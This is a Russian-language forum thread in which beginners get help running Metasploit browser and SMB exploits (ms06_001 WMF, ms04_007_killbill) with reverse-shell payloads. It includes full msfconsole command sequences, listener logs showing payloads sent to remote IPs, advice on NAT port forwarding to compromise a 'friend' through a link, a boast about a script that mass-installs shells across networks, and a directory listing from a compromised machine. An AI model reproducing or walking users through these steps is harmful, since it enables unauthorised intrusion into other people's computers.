В третьей версии ms06_001_wmf_setabortproc А вообще в папке ..\modules\exploits\windows\browser\ ищи сплоиты под IE (в основном они все там).
Посчитал что комунибудь книга пригодится . Вот книга по применению MSF все примеры в книге второй верси метасплоита в книге уделено лиш 2 последнии главы . В книге рассматривается интерфейсы mfsweb,mfsconsole,msfcli для управление ядром MSF . Разработка средств безопасности и эксплойтов Формат-DjVu Вес-16862 KB http://rapidshare.de/files/40213549/__1055___1080___1090___1077___1088__-___1056___1072___1079___1088___1072___1073___1086___1090___1082.html
? [*] Starting Reverse Handler. [*] Waiting for connections to http://93.80.176.249:8080/ [*] HTTP Client connected from 93.80.176.249:1331, redirecting... [*] HTTP Client connected from 93.80.176.249:1333, sending 1804 bytes of payload... а дальше тишина и консоль висит... не подскажите в чем причина? /*пробую сам на себе, делаю как написано)*/
Полностью лог выложи... сплоит WMF юзаешь? если ты юзаешь сам на себе, локально, то почему у тебя IP внешний? Прописывай локальный IP.... через нат по внешнему IP ты сам до себя не достучишься...
msf > ls framework framework.tar msfupdate run_msfconsole run_msfupdate run_msfweb userguide.pdf msf > cd framework msfconsole: chdir: changed to directory framework msf > ls data exploits msfcli msfelfscan msfpayload msfweb sdk tools docs extras msfconsole msfencode msfpescan nops src encoders lib msfdldebug msflogdump msfupdate payloads t msf > ls exploits ..........список эксплойтов.............. msf ie_xp_pfv_metafile > info ie_xp_pfv_metafile Name: Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution Class: remote Version: $Rev: 3818 $ Target OS: win32, winxp, win2003 Keywords: wmf Privileged: No Disclosure: Dec 27 2005 Provided By: H D Moore <hdm [at] metasploit.com san <san [at] xfocus.org> O600KO78RUS[at]unknown.ru Available Targets: Automatic - Windows XP / Windows 2003 / Windows Vista Available Options: Exploit: Name Default Description -------- -------- ------- ------------------------------------------- optional REALHOST External address to use for redirects (NAT) optional HTTPHOST 0.0.0.0 The local HTTP listener host required HTTPPORT 8080 The local HTTP listener port Payload Information: Space: 1904 Avoid: 1 characters | Keys: noconn tunnel reverse Nop Information: SaveRegs: esp ebp | Keys: Encoder Information: | Keys: Description: This module exploits a vulnerability in the GDI library included with Windows XP, 2003, and Vista. This vulnerability uses the 'Escape' metafile function to execute arbitrary code through the SetAbortProc procedure. This module generates a random WMF record stream for each request and is will gzip encode the WMF payload if the browser supports it. References: http://www.securityfocus.com/bid/16074 http://cve.mitre.org/cgi-bin/cvename.cgi?name=2005-4560 http://www.osvdb.org/21987 http://www.milw0rm.com/metasploit/111 http://wvware.sourceforge.net/caolan/ora-wmf.html http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt msf ie_xp_pfv_metafile > set LHOST 93.80.193.97 LHOST -> 93.80.193.97 msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse PAYLOAD -> win32_reverse msf ie_xp_pfv_metafile(win32_reverse) > exploit [*] Starting Reverse Handler. [*] Waiting for connections to http://93.80.193.97:8080/ даю другу ссылку [*] HTTP Client connected from 88.147.194.69:1313, redirecting... [*] HTTP Client connected from 88.147.194.69:1315, sending 1904 bytes of payload... юзаю 2,7 версию 93.80.193.97 - мой внешний IP 2й раз пробовал прописать этот айпи и в LHOST и в HTTPHOST. Таже ситтуация. если прописывать только HTTPHOST и не писать LHOST(которого и в info то нету) то пишет после запуска - Error: Missing required option: LHOST
Зачем ты в LHOST пишешь свой внешний IP если ты ломаешь сам себя? LHOST - параметр начинки, в твоём случае это реверсшелл. Ключевое слово - реверс. Поэтому он должен знать куда коннектится. Если это твой комп то смело пиши локальный IP, на худой конец пробуй 127.0.0.1. Http-сервер метасплоита также у тебя поднимается на локальном IP. Ну не сможешь ты сам к себе обратится по внешнику через NAT! вот если бы ты разместил сплоит где-нибудь в инете, тогда да - надо в LHOST указывать внешний свой IP, чтоб реверс-шелл мог приконнектится со взломанной тачки...
ок, спасибо А если я пытаюсь так сделать с другом то мне в Lhost-е писать свой внешний? И надо ли вообще трогать Httphost? (Сори если вопросы покажутся тупыми, только начал разбираться с эксплойтами..) или HTTPHOST это то, где я размещаю сплойт, а LHOST - то куда идет он если кто то попался?
Если в Инете хочешь взломать друга, то вопервых через нат надо пробросить порты (все) т.е. выставить редирект по всем портам с внешнего ИП на внутренний (локальный). В LHOST - параметр начинки конечно указать свой внешний IP. Сервер метасплоита поднимаешь у себя - на нём будет висеть страница с WMF-сплоитом, начинённым реверсшеллом. Т.е. что происходит. Ты запускуаешь сплоит на своём локальном ИП. Даёшь ссыль другу со своим уже внешним ИП. Друг заходит по ссылке и попадает на Вебсервер, на котором висит этот сплоит. Далее происходит загрузка картинки в кэш браузера и запуск программы просмотра факсов, вот тут и Dll теряет управление и передаёт его на исполняемый код реверсшелла. Он начинает пытаться соединится с твоим компом по произвольным портам в районе 1000-2000. Если у него не получается - то он пробует использовать другой порт... поэтому и пишет постоянный редирект....
Огромное спасибо, буду пробовать Снова вопрос)Сори уже наверно достал, но хочется разобраться.. msf > use ie_xp_pfv_metafile msf ie_xp_pfv_metafile > set LHOST 93.80.193.97 LHOST -> 93.80.193.97 msf ie_xp_pfv_metafile > set REALHOST 10.172.25.1** REALHOST -> 10.172.25.1** msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse PAYLOAD -> win32_reverse msf ie_xp_pfv_metafile(win32_reverse) > exploit [*] Starting Reverse Handler. [*] Waiting for connections to http://93.80.193.97:8080/ Дальше закидываю ссылки.. дальше 2 варианта. 1)[*] HTTP Client connected from 84.54.67.122:1959, redirecting... [*] HTTP Client connected from 84.54.67.122:1987, redirecting... [*] HTTP Client connected from 84.54.67.122:1995, redirecting... .... однако sending 1308 bytes of payload... - не было и 2) [*] HTTP Client connected from 213.234.238.113:2268, sending 1308 bytes of paylo ad... [*] HTTP Client connected from 213.234.238.113:2272, redirecting... и всё.. Сколько примерно должен идти редиректинг то? зы мой внешний IP сейчас 93.80.193.97(IP клиента) Локальный - 10.172.25.1** (тип адреса - присвоен DHCP) (у меня VPN) (всё там смотрю то?) Порт не меняю. На стандартный он не ругается. Я хотябы правильно всё расставил? LHOST 93.80.193.97 (на него и даю ссылку); REALHOST - 10.172.25.1**. Не подскажешь какой параметр за это отвечает? Спасибо за внимание
Почему нельзя учить новичков Когда только начинал заниматься всякой хренотенью, часто задавался вопросом почему более продвинутые интернет-товарищи не делятся инфой. Прошло несколько лет. Уже раз 5 хотел написать статьи о том чего нет на паблике, но то что я лично использую уже года 2. Но каждый раз останавливался. Думаю продвинутые интернет-товарищи поймут почему. Так о чем это я. В течении нескольких месяцев я писал один скажем так скриптик (естественно Metasploit 3), теперь для сканирования сетки с подбором эксплоитов (своих для каждой системы) я нажимаю буквально десяток кнопочек, флажков и т.д. и через пару часов имею списки всех компов с установленными шеллами и открытые консольки тех кто онлайн. Вообщем Metasploit - очень мощный инструмент и если вы сможете его самостоятельно освоить и использовать в своих повседневных целях, то со временем вам может быть доступно все. Удачи. П.С. скрипт не дам никому, а тем кому мог бы дать, сами напишут и получше.
Поэтому и есть на ачате закрытые разделы, по поводу инструмента, согласен... только вот у меня руки пока не доходят до него, чтоб скрипты писать на Руби для MSF. А в целом удобная штука...
Обычно это настраивается в роутере (ADSL-модем) Если ты подключен через VPN к интернету, то даже не знаю, вряд ли получится, хотя х.е.з. надо пробовать... Редирект идёт постоянно, раз не может реверсшелл приконнектится...
Кодировка в консоли Metasploit Framework 3.1? Добрый день. Так получилось что жизнь заставила обратится к MSF 3.1 а точнее использовать ms04_007_killbill + reverse_tcp, Запускалось все под Вистой. Все начиналось хорошо - получил командную строку на целевой машине, одно но - она под XP RUS, соответственно все нужные мне папки русскоязычные, отображаются кракозяблами. В GUI пытался менять кодировку на удаленной машине chcp. В WEB интерфейсе менял в браузере кодировку отображаемой страницы. Результат один - те-же яйца только в профиль (в смысле кракозяблы только разные). Соответственно вопрос - что делать и как быть. Всем спасибо.
А в шелле пробовал менять? Я рекомендую в этом случае поставить бесплатную Virtual PC 2007 от мелкомягких и гостевую Win-XP и уже в гостевуху установить пакет MSF 3.1. Есть подозрение что это из-за того что, cmd-shell в Висте и XP разные... P.S. Хорошо было бы, если тут ты привёл лог с "кракозяблы" чтоб определить Штирлицом в какой кодировке идёт вывод...
Microsoft Windows XP [¥àá¨ï 5.1.2600] () ®à¯®à*æ¨ï *©ªà®á®äâ, 1985-2001. C:\WINDOWS\system32>cd c:\ cd c:\ C:\>dir dir ®¬ ¢ ãáâனá⢥ C *¥ ¨¬¥¥â ¬¥âª¨. ¥à¨©*ë© *®¬¥à ⮬*: BC42-7B8D ®¤¥à¦¨¬®¥ ¯*¯ª¨ C:\ 08.09.2008 19:35 <DIR> ATI 07.09.2008 21:36 0 AUTOEXEC.BAT 07.09.2008 21:36 0 CONFIG.SYS 07.09.2008 21:42 <DIR> Documents and Settings 21.09.2008 13:50 <DIR> lj1010 series 01.10.2008 19:09 <DIR> Program Files 08.09.2008 21:31 19ÿ490 routes.vbs 04.10.2008 17:50 <DIR> WINDOWS 08.09.2008 22:17 <DIR> WUTemp 3 ä*©«®¢ 19ÿ490 ¡*©â 6 ¯*¯®ª 17ÿ067ÿ040ÿ768 ¡*©â ᢮¡®¤*® C:\> C:\>cd "Documents and Settings" cd "Documents and Settings" C:\Documents and Settings>dir dir ®¬ ¢ ãáâனá⢥ C *¥ ¨¬¥¥â ¬¥âª¨. ¥à¨©*ë© *®¬¥à ⮬*: BC42-7B8D ®¤¥à¦¨¬®¥ ¯*¯ª¨ C:\Documents and Settings 07.09.2008 21:42 <DIR> . 07.09.2008 21:42 <DIR> .. 07.09.2008 21:34 <DIR> All Users 07.09.2008 21:43 <DIR> ¤¬¨*¨áâà*â®à 09.09.2008 18:24 <DIR> à¨áâ¨** 0 ä*©«®¢ 0 ¡*©â 5 ¯*¯®ª 17ÿ066ÿ319ÿ872 ¡*©â ᢮¡®¤*® C:\Documents and Settings>chcp chcp ¥ªãé*ï ª®¤®¢*ï áâà**¨æ*: 866 C:\Documents and Settings>chcp 1251 chcp 1251 ¥ªãé*ï ª®¤®¢*ï áâà**¨æ*: 1251 C:\Documents and Settings>dir dir Òîì â óñòðîéñòâå C íå èìååò ìåòêè. Ñåðèéíûé íîìåð òîìà: BC42-7B8D Ñîäåðæèìîå ïàïêè C:\Documents and Settings 07.09.2008 21:42 <DIR> . 07.09.2008 21:42 <DIR> .. 07.09.2008 21:34 <DIR> All Users 07.09.2008 21:43 <DIR> Àäìèíèñòðàòîð 09.09.2008 18:24 <DIR> Êðèñòèíà 0 ôàéëîâ 0 áàéò 5 ïàïîê 17*065*467*904 áàéò ñâîáîäíî C:\Documents and Settings>
Штирлиц показывает Win->Dos(3) 3 раза? тут всё ок - преобразований не проводилось. (наверно просто шрифт нужен с кириллицой).